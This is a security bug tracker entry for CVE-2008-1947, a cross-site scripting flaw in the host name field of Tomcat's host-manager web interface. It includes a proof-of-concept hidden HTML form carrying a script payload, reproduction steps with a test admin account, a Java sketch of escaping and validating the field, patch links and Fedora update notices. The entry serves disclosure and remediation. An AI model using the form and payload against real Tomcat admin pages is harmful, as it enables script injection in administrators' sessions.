Bug 446393 (CVE-2008-1947)

Summary: CVE-2008-1947 Tomcat host manager xss - name field
Product: [Other] Security Response
Component: vulnerability
Reporter: Petr Šplíchal <psplicha>
Assignee: David Walluck <dwalluck>
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
CC: devrim, dwalluck, kreilly, ohudlick, rafaels, security-response-team
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2010-05-10 15:33:36 UTC
Bug Depends On: 449916, 449917, 458088, 458089, 458097, 458444, 458445, 460125, 460126, 460127, 460131, 460132

Description Petr Šplíchal 2008-05-14 13:33:44 UTC
Similarly to the "alias" field in bug 247994, Tomcat's host manager web interface
suffers from a JavaScript exploit in the "name" field:

  Assume that after logging in, the victim was led to the malicious web
  server with the following file installed.
  <form action="http://localhost:8080/host-manager/html/add" method="get">
     <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">
     <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">
     <input type="submit">
  </form>

Steps to reproduce:

* install tomcat5 tomcat5-admin-webapps.
* edit /etc/tomcat5/tomcat-users.xml and add
   <role rolename="tomcat"/> 
   <user username="tomcat" password="tomcat" roles="tomcat,admin"/>
* restart tomcat5
* Visit http://localhost:8080/host-manager/html/add
* log in with user name tomcat and password tomcat
* Enter the following:
      name: <script>alert("name-exploit!")</script>
      alias: somealias
* hit add.
* You should see the javascript alert box popping up.
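
The report above comes down to the "name" parameter being echoed into the response page without encoding. The following before/after sketch is an added example, not part of the original report and not Tomcat's host-manager code; the class, the method names, the message text and the DNS-style allow-list for host names are all assumptions made for illustration.

```java
import java.util.regex.Pattern;

// Added illustration; hypothetical names, not code from Tomcat's host-manager.
public class HostNameEcho {
    // Assumption: a host name is DNS-style (labels of letters, digits, '-', joined by '.').
    private static final Pattern HOST_NAME = Pattern.compile(
        "^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
        + "(\\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$");

    static boolean isValidHostName(String name) {
        return name != null && HOST_NAME.matcher(name).matches();
    }

    // Encode the characters that are significant in HTML text and attribute values.
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Before: the request parameter is concatenated into the page as-is.
    static String messageUnsafe(String name) {
        return "<p>Message: added host " + name + "</p>";
    }

    // After: reject values that are not host names, and encode whatever is echoed either way.
    static String messageSafe(String name) {
        String shown = escapeHtml(name);
        return isValidHostName(name)
            ? "<p>Message: added host " + shown + "</p>"
            : "<p>Message: invalid host name " + shown + "</p>";
    }

    public static void main(String[] args) {
        // Constructed samples: a normal host name and the value from the steps to reproduce.
        String[] samples = { "www.example.com", "<script>alert(\"name-exploit!\")</script>" };
        for (String s : samples) {
            System.out.println(messageUnsafe(s) + "\n" + messageSafe(s));
        }
    }
}
```

Validation alone is not the fix: the error path still echoes the rejected value, so the encoding step has to apply on every branch that writes the parameter back.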

Comment 1 Marc Schoenefeld 2008-06-04 08:50:20 UTC
Public patch available here:   
http://svn.apache.org/viewvc?view=rev&revision=662582

Comment 3 Tomas Hoger 2008-06-05 06:48:30 UTC
Public now via:

  http://marc.info/?l=tomcat-user&m=121244319501278&w=2
  http://tomcat.apache.org/security-5.html
  http://tomcat.apache.org/security-6.html

Will be fixed upstream in the upcoming 5.5.27 and 6.0.17.

Comment 11 Fedora Update System 2008-09-05 17:10:46 UTC
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9

Comment 12 Fedora Update System 2008-09-11 17:17:13 UTC
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 13 Fedora Update System 2008-09-15 18:12:15 UTC
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8

Comment 14 Fedora Update System 2008-09-15 20:13:52 UTC
tomcat5-5.5.27-0jpp.2.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc9

Comment 15 Fedora Update System 2008-09-15 20:16:24 UTC
tomcat5-5.5.27-0jpp.2.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc8

Comment 16 Fedora Update System 2008-09-16 23:24:54 UTC
tomcat5-5.5.27-0jpp.2.fc9 has been pushed to the Fedora 9 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 17 Fedora Update System 2008-09-16 23:28:21 UTC
tomcat5-5.5.27-0jpp.2.fc8 has been pushed to the Fedora 8 stable repository.  If problems still persist, please make note of it in this bug report.